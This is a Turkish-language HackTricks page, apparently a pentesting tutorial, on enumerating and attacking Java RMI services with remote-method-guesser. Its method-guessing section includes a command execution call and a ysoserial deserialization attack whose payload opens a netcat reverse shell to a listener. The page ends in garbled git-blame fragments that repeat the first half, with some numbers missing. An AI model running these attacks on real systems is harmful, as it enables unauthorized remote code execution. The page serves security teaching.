hacktricks/network-services-pentesting/1099-pentesting-java-rmi.md

# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>

<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>

\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)'i kullanarak dünyanın **en gelişmiş** topluluk araçları tarafından desteklenen **iş akışlarını kolayca oluşturun ve otomatikleştirin**.\
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## Temel Bilgiler

_Java Uzak Yöntem Çağrısı_, veya _Java RMI_, bir nesne odaklı _RPC_ mekanizmasıdır ve bir _Java sanal makinesinde_ bulunan bir nesnenin başka bir _Java sanal makinesinde_ bulunan bir nesnedeki yöntemleri çağırmasına izin verir. Bu, geliştiricilere nesne odaklı bir paradigma kullanarak dağıtılmış uygulamalar yazma imkanı sağlar. _Java RMI_ hakkında saldırgan bir bakış açısından kısa bir tanıtım [bu blackhat sunumunda](https://youtu.be/t\_aw1mDNhzI?t=202) bulunabilir.

**Varsayılan port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
```
PORT      STATE SERVICE      VERSION
1090/tcp  open  ssl/java-rmi Java RMI
9010/tcp  open  java-rmi     Java RMI
37471/tcp open  java-rmi     Java RMI
40259/tcp open  ssl/java-rmi Java RMI
```
Genellikle, yalnızca varsayılan _Java RMI_ bileşenleri (_RMI Registry_ ve _Activation System_) ortak bağlantı noktalarına bağlanır. Gerçek _RMI_ uygulamasını uygulayan _uzak nesneler_ genellikle yukarıdaki çıktıda gösterildiği gibi rastgele bağlantı noktalarına bağlanır.

_nmap_ bazen _SSL_ korumalı _RMI_ hizmetlerini tanımlamakta zorluk çeker. Ortak bir _RMI_ bağlantı noktasında bilinmeyen bir ssl hizmetiyle karşılaşırsanız, daha fazla araştırma yapmalısınız.

## RMI Bileşenleri

Basit bir ifadeyle, _Java RMI_ bir geliştiricinin bir _Java nesnesini_ ağda kullanılabilir hale getirmesine olanak tanır. Bu, istemcilerin bağlanabileceği ve karşılık gelen nesnede yöntemler çağırabileceği bir _TCP_ bağlantı noktası açar. Bu basit gibi görünse de, _Java RMI_ nin çözmesi gereken birkaç zorluk vardır:

1. Bir yöntem çağrısını _Java RMI_ aracılığıyla yönlendirmek için, istemcilerin hedef nesnenin IP adresini, dinleme bağlantı noktasını, uygulanan sınıfı veya arabirimini ve hedef nesnenin `ObjID` değerini ( `ObjID`, nesne ağda kullanılabilir hale getirildiğinde oluşturulan benzersiz ve rastgele bir tanımlayıcıdır. _Java RMI_, aynı _TCP_ bağlantı noktasında birden fazla nesnenin dinlemesine izin verir çünkü gereklidir).
2. Uzak istemciler, açığa çıkarılan nesnede yöntemleri çağırarak sunucuda kaynaklar ayırabilir. _Java sanal makinesi_, bu kaynakların hangisinin hala kullanımda olduğunu ve hangilerinin çöp toplanabileceğini takip etmelidir.

İlk zorluk, temelde bir _Java RMI_ için bir isimlendirme hizmeti olan _RMI registry_ ile çözülür. _RMI registry_ kendisi aynı zamanda bir _RMI hizmeti_ olmasına rağmen, uygulanan arabirim ve `ObjID` sabit ve tüm _RMI_ istemcileri tarafından bilinir. Bu, _RMI_ istemcilerinin ilgili _TCP_ bağlantı noktasını bilerek _RMI_ kaydını tüketmelerine olanak tanır.

Geliştiriciler, _Java nesnelerini_ ağda kullanılabilir hale getirmek istediklerinde genellikle onları bir _RMI registry_ e bağlarlar. _Registry_, nesneye bağlanmak için gereken tüm bilgileri depolar (IP adresi, dinleme bağlantı noktası, uygulanan sınıf veya arabirim ve `ObjID` değeri) ve bunu insan tarafından okunabilir bir isim altında (_bağlı isim_) kullanılabilir hale getirir. _RMI hizmetini_ tüketmek isteyen istemciler, _RMI registry_ den ilgili _bağlı ismi_ ve kayıt, bağlantı için gerekli tüm bilgileri isteyebilir. Dolayısıyla, durum temelde normal bir _DNS_ hizmetiyle aynıdır. Aşağıdaki liste küçük bir örneği göstermektedir:
```java
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;

public class ExampleClient {

private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";

public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost);     // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName);  // Lookup the desired bound name
String response = ref.remoteMethod();                           // Call a remote method

} catch( Exception e) {
e.printStackTrace();
}
}
}
```
Yukarıda bahsedilen zorluklardan ikincisi _Dağıtılmış Çöp Toplayıcı_ (_DGC_) tarafından çözülür. Bu, bilinen bir `ObjID` değerine sahip başka bir _RMI servisi_ ve temelde her _RMI uç noktasında_ mevcuttur. Bir _RMI istemcisi_ bir _RMI servisini_ kullanmaya başladığında, ilgili _uzak nesnenin_ kullanımda olduğuna dair bir bilgiyi _DGC_'ye gönderir. _DGC_, referans sayısını takip edebilir ve kullanılmayan nesneleri temizleyebilir.

Eskimiş _Etkinleştirme Sistemi_ ile birlikte, bunlar _Java RMI_'ın üç varsayılan bileşenidir:

1. _RMI Kayıt Defteri_ (`ObjID = 0`)
2. _Etkinleştirme Sistemi_ (`ObjID = 1`)
3. _Dağıtılmış Çöp Toplayıcı_ (`ObjID = 2`)

_Java RMI_'ın varsayılan bileşenleri uzun süredir bilinen saldırı vektörleri olmuştur ve eski _Java_ sürümlerinde birden fazla zayıflık bulunmaktadır. Bir saldırgan bakış açısından, bu varsayılan bileşenler ilginçtir, çünkü bilinen sınıflar / arabirimler uygulanmıştır ve bunlarla etkileşim kurmak kolaydır. Bu durum özel _RMI servisleri_ için farklıdır. Bir _uzak nesne_ üzerinde bir yöntem çağırmak için, ilgili yöntem imzasını önceden bilmelisiniz. Var olan bir yöntem imzasını bilmeden, bir _RMI servisiyle_ iletişim kurmanın bir yolu yoktur.

## RMI Numaralandırma

[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser), otomatik olarak yaygın _RMI zayıflıklarını_ tanımlayabilen bir _Java RMI_ zayıflık tarayıcısıdır. Bir _RMI_ uç noktası tanımladığınızda, denemelisiniz:
```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] 	- plain-server2
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] 	- legacy-service
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] 	- plain-server
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] 	- http://iinsecure.dev/well-hidden-development-folder/
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] 	- Caught ClassNotFoundException during lookup call.
[+] 	  --> The type java.lang.String is unmarshalled via readObject().
[+] 	  Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] 	- Caught MalformedURLException during lookup call.
[+] 	  --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] 	  Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] 	- Caught NotBoundException during unbind call (unbind was accepeted).
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] 	- Security Manager rejected access to the class loader.
[+] 	  --> The server does use a Security Manager.
[+] 	  Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] 	- DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] 	  Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] 	- Caught IllegalArgumentException after sending An Trinh gadget.
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] 	- Caught IllegalArgumentException during activate call (activator is present).
[+] 	  --> Deserialization allowed	 - Vulnerability Status: Vulnerable
[+] 	  --> Client codebase enabled	 - Configuration Status: Non Default
```
Enumeration eyleminin çıktısı projenin [belgelendirme sayfalarında](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) daha detaylı olarak açıklanmaktadır. Sonuca bağlı olarak tanımlanan zafiyetleri doğrulamaya çalışmalısınız.

_remote-method-guesser_ tarafından gösterilen `ObjID` değerleri hizmetin çalışma süresini belirlemek için kullanılabilir. Bu, diğer zafiyetleri tanımlamaya olanak tanır:
```
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: 		-4004948013687638236
[+] UID:
[+] 	Unique: 	1442798173
[+] 	Time: 		1640761503828 (Dec 29,2021 08:05)
[+] 	Count: 		-32760
```
## Uzak Metotları Kaba Kuvvet Yöntemiyle Deneme

Tarama sırasında herhangi bir zayıflık tespit edilmemiş olsa bile, mevcut _RMI_ hizmetleri hala tehlikeli fonksiyonları ortaya çıkarabilir. Ayrıca, _RMI_ varsayılan bileşenlerine yapılan _RMI_ iletişimi, özel _RMI_ hizmetleriyle iletişim kurulduğunda genellikle bu tür filtrelerin bulunmadığı için korunmamaktadır. Dolayısıyla, _RMI_ hizmetlerinde geçerli metod imzalarını bilmek değerlidir.

Ne yazık ki, _Java RMI_, _uzak nesnelerde_ metodları sıralamayı desteklemez. Bununla birlikte, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) veya [rmiscout](https://github.com/BishopFox/rmiscout) gibi araçlarla metod imzalarını kaba kuvvet yöntemiyle denemek mümkündür:
```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 	752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 	2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] 	MethodGuesser is running:
[+] 		--------------------------------
[+] 		[ plain-server2  ] HIT! Method with signature String execute(String dummy) exists!
[+] 		[ plain-server2  ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] 		[ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] 		[6562 / 6562] [#####################################] 100%
[+] 	done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] 	- plain-server2 == plain-server
[+] 		--> String execute(String dummy)
[+] 		--> String system(String dummy, String[] dummy2)
[+] 	- legacy-service
[+] 		--> void logMessage(int dummy1, String dummy2)
[+] 		--> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] 		--> String login(java.util.HashMap dummy1)
```
Belirlenen yöntemler şu şekilde çağrılabilir:
```
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
```
Ya da şu şekilde deserializasyon saldırıları gerçekleştirebilirsiniz:
```
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] 	Using non primitive argument type java.lang.String on position 0
[+] 	Specified method signature is String execute(String dummy)
[+]
[+] 	Caught ClassNotFoundException during deserialization attack.
[+] 	Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] 	Deserialization attack probably worked :)

$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
```
Daha fazla bilgi şu makalelerde bulunabilir:

* [JEP 290'dan sonra Java RMI servislerine saldırı](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
* [Metod Tahmini](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)

Tahmin etmenin yanı sıra, karşılaşılan bir _RMI_ servisinin arayüzünü veya hatta uygulamasını aramak için arama motorlarına veya _GitHub_ üzerinde de bakmalısınız. _Bound name_ ve uygulanan sınıfın veya arayüzün adı burada yardımcı olabilir.

## Bilinen Arayüzler

[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser), sınıfları veya arayüzleri, bilinen _RMI servisleri_ veritabanında listelenmişse `known` olarak işaretler. Bu durumlarda, ilgili _RMI servisi_ hakkında daha fazla bilgi almak için `known` eylemini kullanabilirsiniz:
```
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] 	- jmxrmi
[+] 		--> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] 		    Endpoint: localhost:41695  TLS: no  ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]

$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] 	JMX Server
[+]
[+] Class Name:
[+] 	- javax.management.remote.rmi.RMIServerImpl_Stub
[+] 	- javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] 	Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] 	This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] 	method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] 	value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] 	actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] 	- String getVersion()
[+] 	- javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] 	- https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] 	- https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] 	-----------------------------------
[+] 	Name:
[+] 		MLet
[+]
[+] 	Description:
[+] 		MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] 		other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] 		is therefore most of the time equivalent to remote code execution.
[+]
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter
[+]
[+] 	-----------------------------------
[+] 	Name:
[+] 		Deserialization
[+]
[+] 	Description:
[+] 		Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] 		method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] 		actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] 		establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter
```
## Shodan

* `port:1099 java`

## Araçlar

* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)

## Referanslar

* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)

## HackTricks Otomatik Komutları
```
Protocol_Name: Java RMI                                        #Protocol Abbreviation if there is one.
Port_Number:  1090,1098,1099,1199,4443-4446,8999-9010,9999     #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation            #Protocol Abbreviation Spelled out

Entry_1:
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
```
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>

\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen **iş akışlarını kolayca oluşturun ve otomatikleştirin**.\
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Sıfırdan kahramana kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.

</details>
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												arte

											
										
										
											2024-01-03 10:42:55 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:18:23 +00:00
+								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
 								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
 								* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
-												update

											
										
										
											2023-01-01 16:19:07 +00:00
+								\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)'i kullanarak dünyanın **en gelişmiş** topluluk araçları tarafından desteklenen **iş akışlarını kolayca oluşturun ve otomatikleştirin**.\
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bugün Erişim Alın:
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
-												update

											
										
										
											2023-01-01 16:19:07 +00:00
+								{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Temel Bilgiler
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								_Java Uzak Yöntem Çağrısı_, veya _Java RMI_, bir nesne odaklı _RPC_ mekanizmasıdır ve bir _Java sanal makinesinde_ bulunan bir nesnenin başka bir _Java sanal makinesinde_ bulunan bir nesnedeki yöntemleri çağırmasına izin verir. Bu, geliştiricilere nesne odaklı bir paradigma kullanarak dağıtılmış uygulamalar yazma imkanı sağlar. _Java RMI_ hakkında saldırgan bir bakış açısından kısa bir tanıtım [bu blackhat sunumunda](https://youtu.be/t\_aw1mDNhzI?t=202) bulunabilir.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								**Varsayılan port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
-												GitBook: [#3240] No subject

											
										
										
											2022-06-06 22:28:05 +00:00
+								```
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								PORT      STATE SERVICE      VERSION
 /tcp  open  ssl/java-rmi Java RMI
 /tcp  open  java-rmi     Java RMI
 /tcp open  java-rmi     Java RMI
 /tcp open  ssl/java-rmi Java RMI
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Genellikle, yalnızca varsayılan _Java RMI_ bileşenleri (_RMI Registry_ ve _Activation System_) ortak bağlantı noktalarına bağlanır. Gerçek _RMI_ uygulamasını uygulayan _uzak nesneler_ genellikle yukarıdaki çıktıda gösterildiği gibi rastgele bağlantı noktalarına bağlanır.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								_nmap_ bazen _SSL_ korumalı _RMI_ hizmetlerini tanımlamakta zorluk çeker. Ortak bir _RMI_ bağlantı noktasında bilinmeyen bir ssl hizmetiyle karşılaşırsanız, daha fazla araştırma yapmalısınız.
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## RMI Bileşenleri
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:18:23 +00:00
+								Basit bir ifadeyle, _Java RMI_ bir geliştiricinin bir _Java nesnesini_ ağda kullanılabilir hale getirmesine olanak tanır. Bu, istemcilerin bağlanabileceği ve karşılık gelen nesnede yöntemler çağırabileceği bir _TCP_ bağlantı noktası açar. Bu basit gibi görünse de, _Java RMI_ nin çözmesi gereken birkaç zorluk vardır:
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+. Bir yöntem çağrısını _Java RMI_ aracılığıyla yönlendirmek için, istemcilerin hedef nesnenin IP adresini, dinleme bağlantı noktasını, uygulanan sınıfı veya arabirimini ve hedef nesnenin `ObjID` değerini ( `ObjID`, nesne ağda kullanılabilir hale getirildiğinde oluşturulan benzersiz ve rastgele bir tanımlayıcıdır. _Java RMI_, aynı _TCP_ bağlantı noktasında birden fazla nesnenin dinlemesine izin verir çünkü gereklidir).
 . Uzak istemciler, açığa çıkarılan nesnede yöntemleri çağırarak sunucuda kaynaklar ayırabilir. _Java sanal makinesi_, bu kaynakların hangisinin hala kullanımda olduğunu ve hangilerinin çöp toplanabileceğini takip etmelidir.
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								İlk zorluk, temelde bir _Java RMI_ için bir isimlendirme hizmeti olan _RMI registry_ ile çözülür. _RMI registry_ kendisi aynı zamanda bir _RMI hizmeti_ olmasına rağmen, uygulanan arabirim ve `ObjID` sabit ve tüm _RMI_ istemcileri tarafından bilinir. Bu, _RMI_ istemcilerinin ilgili _TCP_ bağlantı noktasını bilerek _RMI_ kaydını tüketmelerine olanak tanır.
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 03:13:19 +00:00
+								Geliştiriciler, _Java nesnelerini_ ağda kullanılabilir hale getirmek istediklerinde genellikle onları bir _RMI registry_ e bağlarlar. _Registry_, nesneye bağlanmak için gereken tüm bilgileri depolar (IP adresi, dinleme bağlantı noktası, uygulanan sınıf veya arabirim ve `ObjID` değeri) ve bunu insan tarafından okunabilir bir isim altında (_bağlı isim_) kullanılabilir hale getirir. _RMI hizmetini_ tüketmek isteyen istemciler, _RMI registry_ den ilgili _bağlı ismi_ ve kayıt, bağlantı için gerekli tüm bilgileri isteyebilir. Dolayısıyla, durum temelde normal bir _DNS_ hizmetiyle aynıdır. Aşağıdaki liste küçük bir örneği göstermektedir:
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
+								```java
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								import java.rmi.registry.Registry;
-												Update RMI source code example

											
										
										
											2021-12-30 08:57:22 +00:00
+								import java.rmi.registry.LocateRegistry;
 								import lab.example.rmi.interfaces.RemoteService;
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Update Java RMI

The content on pentesting Java RMI was not pretty useful. It was
basically a one to one copy of a blog post that discusses only one
characteristic of Java RMI.

It was replaced by an short overview on how to pentest Java RMI. This
overview contains everything one needs to know to get started.

											
										
										
											2021-12-29 08:29:43 +00:00
+								public class ExampleClient {
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								private static final String remoteHost = "172.17.0.2";
 								private static final String boundName = "remote-service";
-												GitBook: [master] one page modified
											
										
										
											2021-06-10 16:42:00 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								public static void main(String[] args)
 								{
 								try {
 								Registry registry = LocateRegistry.getRegistry(remoteHost);     // Connect to the RMI registry
 								RemoteService ref = (RemoteService)registry.lookup(boundName);  // Lookup the desired bound name
 								String response = ref.remoteMethod();                           // Call a remote method
-												GitBook: [master] 2 pages modified
											
										
										
											2021-06-18 17:11:21 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								} catch( Exception e) {
 								e.printStackTrace();
 								}
 								}
 								}
 								```
